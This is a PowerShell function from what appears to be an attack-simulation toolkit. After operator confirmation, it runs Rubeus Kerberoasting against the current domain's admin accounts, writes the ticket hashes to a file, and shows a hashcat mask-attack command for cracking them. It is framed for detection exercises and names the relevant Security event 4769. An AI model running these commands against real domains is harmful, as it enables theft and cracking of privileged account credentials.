Private/Start-KerberoastingAttack.ps1

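function Start-KerberoastingAttack {
    <#
    .SYNOPSIS
        Shows, optionally runs, and logs the Kerberoasting step of the scenario.

    .DESCRIPTION
        Kerberoasting is a technique used by attackers which allows them to
        request a service ticket for any service with a registered SPN.

        The function prints the Rubeus command line, asks the operator whether
        to run it (default answer $No; unattended runs are forced to $No), and
        on confirmation runs Rubeus against the domain in $env:USERDNSDOMAIN,
        limited by the LDAP filter admincount=1. Output goes to
        KR-<domain>.hashes.txt in the current directory.

    .NOTES
        Reads script-level state that is defined outside this function:
        $Script:RUBEUS, $Script:DateFormatLog, $UnAttended, $yes, $No and the
        $fgc* colour variables. Calls the helpers Get-FunctionName, Write-Log,
        Write-Highlight, Get-Answer and Get-RunTime.

        The output file holds ticket hashes that can be attacked offline. This
        function only deletes a stale copy before a new run; it never removes
        the file afterwards, so cleanup is up to the operator.

        For detection exercises: the service-ticket requests made by this step
        are recorded on domain controllers as Security event 4769 when Kerberos
        service ticket auditing is enabled.
    #>

    $CurrentFunction = Get-FunctionName
    Write-Log -Message "### Start Function $CurrentFunction ###"
    $StartRunTime = (Get-Date).ToString($Script:DateFormatLog)
    #################### main code | out- host #####################

    $myDomain   = $env:USERDNSDOMAIN
    $hashes     = "KR-$myDomain.hashes.txt"
    # Single source for the filter so that the command shown to the operator,
    # the command executed and the command written to the log cannot drift apart.
    $ldapFilter = 'admincount=1'
    $executed   = $false

    # example: .\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /domain:SANDBOX.CORP /outfile:.\SANDBOX.CORP.hashes.txt
    Write-Host      -NoNewline " Command: "
    Write-Highlight -Text ".\Rubeus.exe ", "kerberoast ", "/ldapfilter:", "'$ldapFilter' ", "/domain:", "$myDomain", " /outfile:.\", "$hashes" `
        -Color $fgcC, $fgcF, $fgcS, $fgcV, $fgcS, $fgcV, $fgcS, $fgcV

    If ($UnAttended) {
        # Unattended runs never execute this step: the answer is forced to $No.
        $answer = $No
    }
    else {
        $question = "Would you like to run this step - Y or N? Default "
        $answer = Get-Answer -question $question -defaultValue $No
    }

    If ($answer -eq $yes) {
        # Remove a stale result so the file opened below belongs to this run.
        if (Test-Path -LiteralPath $hashes) { Remove-Item -LiteralPath $hashes }

        Invoke-Command -ScriptBlock {
            param($rubeusPath, $domain, $outfile, $filter)
            & $rubeusPath kerberoast /ldapfilter:$filter /domain:$domain /outfile:$outfile
        } -ArgumentList $($Script:RUBEUS), $myDomain, $hashes, $ldapFilter
        $executed = $true

        # No output file is created when nothing was roasted or the tool failed;
        # opening a missing path would only raise an unrelated error.
        if (Test-Path -LiteralPath $hashes) {
            Invoke-Item -LiteralPath ".\$hashes"
        }
        else {
            Write-Warning "No output file .\$hashes was created."
            Write-Log -Message " >> No output file .\$hashes was created"
        }

        # NOTE(review): $UnAttended forces $No above, so the Start-Sleep branches
        # in this block look unreachable unless $No equals $yes - confirm.
        If ($UnAttended) { Start-Sleep 2 } else { Pause }
        #https://medium.com/geekculture/hashcat-cheat-sheet-511ce5dd7857
        Write-Host "`n"
        write-host "The next step is " -NoNewline; write-host "cracking" -NoNewline -ForegroundColor $fgcH
        Write-host " the roasted hashes. HASHCAT is a good tool."
        Write-host "Let’s use the example where you know the password policy for the password;"
        Write-host "Known as Brute-force or mask attack."
        Write-Host "The cracking mode for TGS-REP hashes is 13100.`n"

        # The example previously showed mode 13000, contradicting the 13100
        # stated in the line above; both now agree.
        # example: .\hashcat.exe -a 3 -m 13100 ./SANDBOX.CORP.hashes.txt ?u?l?l?l?l?l?d?d
        Write-Host      -NoNewline " Example: "
        Write-Highlight -Text ".\hashcat.exe ", "-a ", "3", " -m ", "13100 ", "./$hashes ", "?u?l?l?l?l?l?d?d" `
            -Color $fgcC, $fgcS, $fgcV, $fgcS, $fgcV, $fgcV, $fgcF
        Write-Host "`n"
        If ($UnAttended) { Start-Sleep 2 } else { Pause }
    }

    # The log is the record of what the exercise actually did: write the real
    # command line (including the LDAP filter) and only claim "Run" when the
    # tool was invoked.
    if ($executed) {
        Write-Log -Message " >> Run .\$Script:RUBEUS kerberoast /ldapfilter:$ldapFilter /domain:$myDomain /outfile:.\$hashes"
    }
    else {
        Write-Log -Message " >> Skipped .\$Script:RUBEUS kerberoast /ldapfilter:$ldapFilter /domain:$myDomain /outfile:.\$hashes"
    }
    ######################## main code ############################
    $runtime = Get-RunTime -StartRunTime $StartRunTime
    Write-Log -Message " Run Time: $runtime [h] ###"
    Write-Log -Message "### End Function $CurrentFunction ###"
}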